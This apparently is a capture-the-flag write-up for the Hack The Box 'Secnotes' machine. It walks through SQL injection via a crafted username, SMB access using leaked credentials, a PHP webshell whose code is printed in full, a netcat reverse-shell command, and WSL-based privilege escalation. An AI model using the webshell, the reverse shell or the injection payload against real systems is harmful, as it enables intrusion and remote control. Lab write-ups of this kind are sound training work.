This is a write-up for the recently retired Secnotes machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.

TL;DR: SQLi & WSL Escape | I did this box a few months ago, so the commentary on it may be a little rusty. It’s clear that it was popular, since it wasn’t voted out for so long. The main attack vectors in this were SQL Injection through the login field, and then escaping through cleartext passwords in the Windows Subsystem for Linux.

PART ONE: USER

Let’s begin with an nmap scan:

It seems like there are only two services running on this box: HTTP & SMB. We can also see that the webserver is running Microsoft IIS, which is definitely important to note.

Visiting the website shows a login screen, with the option to create an account:

I initially tried some simple logins (such as admin/admin or admin/password) but didn’t get anywhere. So, I decided to create an account with the details user123/password123 and see what’s inside. The basic functionality of the website is as follows:

There are a few important functions to take from this:

We can create/delete notes

We can change our own password

We can contact the owner

My first discovery on here was that we could perform XSS on any of the fields:

Since we have an option to send forms to the owner, I tried forming a cookie-stealing XSS that would steal an administrator’s cookie, however after leaving it for a while, I never received a call back.

I then tried to do some SQLi on the PHPSESSID cookie, and some SQLi on the initial login, but got nowhere through this. Since I’d hit a dead end, I gave up for that evening.

When I came back to the box, I decided to try a method that I had seen whilst reading through a write-up of an older box, Nightmare. In this, SQLi was achieved through creating an account with a username in which the SQL injection took place.

Let’s give this a go by creating an account with the username user’ OR 1=1#:

With this now created, we can log in and view all the notes!

Whilst Mimi’s Sticky Buns and TestNote were useless, the other two were interesting:

It looks like we’ve found some SMB credentials! We can now connect to the server like so:

george@kali:~/htb/secnotes$ smbclient -U tyler \\\\10.10.10.97\

ew-site Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*& Try "help" to get a list of possible commands. smb: \> pwd Current directory is \\10.10.10.97

ew-site\ smb: \> ls . D 0 Sat Sep 8 18:59:16 2018 .. D 0 Sat Sep 8 18:59:16 2018 iisstart.htm A 696 Thu Jun 21 11:26:03 2018 iisstart.php A 78 Sat Sep 8 18:57:36 2018 iisstart.png A 98757 Thu Jun 21 11:26:03 2018 12978687 blocks of size 4096. 7860782 blocks available smb: \>

This is strange — we have some IIS files that we haven’t come across yet. After attempting some further enumeration on this service, I decided to rescan the system to see if our initial nmap scan had missed anything:

Here, we can wee a port that didn’t appear before: 8808. Attempting to connect to this port reveals that it’s running as a website:

As such, let’s visit this in the browser:

Since we’ve now found the default IIS page (iisstart.htm), we can assume that the SMB server serves the pages for this site. We can test this theory by uploading a simple “test.html” webpage:

From here it’s trivial to upload a PHP reverse shell and therefore perform RCE. I used this really short script as my webshell:

<form action="rce.php" method="get"> <input type="text" name="cmd"> <input type="submit"> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>

With this uploaded, we can now run commands:

Since we have read access, we can go ahead and read the user flag:

PART TWO: ROOT

It would definitely be far easier to move on from here with a “proper” shell, so we should try to upgrade to that. For this to happen, I first passed nc64.exe into the new-site directory through the SMB client, and then set up a reverse shell. To set up this shell, I entered…

nc64.exe -e cmd.exe 10.10.14.214 4444

…into the webshell, and waited to catch it with netcat:

With a proper shell now in place, we can begin enumerating. Before long, I found a strange folder in the C:\ directory:

C:\>dir Volume in drive C has no label. Volume Serial Number is 9CDD-BADA Directory of C:\ 06/21/2018 03:07 PM <DIR> Distros 06/21/2018 06:47 PM <DIR> inetpub 06/22/2018 02:09 PM <DIR> Microsoft 04/11/2018 04:38 PM <DIR> PerfLogs 06/21/2018 08:15 AM <DIR> php7 08/19/2018 02:56 PM <DIR> Program Files 06/21/2018 06:47 PM <DIR> Program Files (x86) 06/21/2018 03:07 PM 201,749,452 Ubuntu.zip 06/21/2018 03:00 PM <DIR> Users 08/19/2018 11:15 AM <DIR> Windows 09/09/2018 03:25 AM 0 __output 2 File(s) 201,749,452 bytes 9 Dir(s) 32,515,137,536 bytes free C:\>

It’s strange that we’d have a distros folder in a Windows machine, so it seems like this may be what we’re looking for. In the distros folder, there was one other folder: Ubuntu.

C:\Distros\Ubuntu>dir Volume in drive C has no label. Volume Serial Number is 9CDD-BADA Directory of C:\Distros\Ubuntu 09/09/2018 02:53 AM <DIR> . 09/09/2018 02:53 AM <DIR> .. 07/11/2017 06:10 PM 190,434 AppxBlockMap.xml 07/11/2017 06:10 PM 2,475 AppxManifest.xml 06/21/2018 03:07 PM <DIR> AppxMetadata 07/11/2017 06:11 PM 10,554 AppxSignature.p7x 06/21/2018 03:07 PM <DIR> Assets 06/21/2018 03:07 PM <DIR> images 07/11/2017 06:10 PM 201,254,783 install.tar.gz 07/11/2017 06:10 PM 4,840 resources.pri 06/21/2018 05:51 PM <DIR> temp 07/11/2017 06:10 PM 222,208 ubuntu.exe 07/11/2017 06:10 PM 809 [Content_Types].xml 7 File(s) 201,686,103 bytes 6 Dir(s) 32,515,235,840 bytes free C:\Distros\Ubuntu>

Launching ubuntu.exe just makes the shell hang, and eventually die. I did some research on this folder for a while, and found out that this is part of the WSL (Windows Subsystem for Linux). Since we’re trying to look for ways to get into this, I searched for some other ESL-related files:

Directory of C:\Windows\System32: 114,688 wsl.exe Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf: 114,688 wsl.exe Directory of C:\Windows\System32: 115,712 bash.exe Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5: 115,712 bash.exe Directory of C:\Distros\Ubuntu: 222,208 ubuntu.exe

I then ran the wsl.exe file, which gave us a shell (the python command simply upgrades us to a TTY shell):

As part of the usual Linux enumeration, I checked the .bash_history file and found the following:

The administrator SMB credentials are there! Let’s copy this command into our own terminal:

And with that, the box is complete!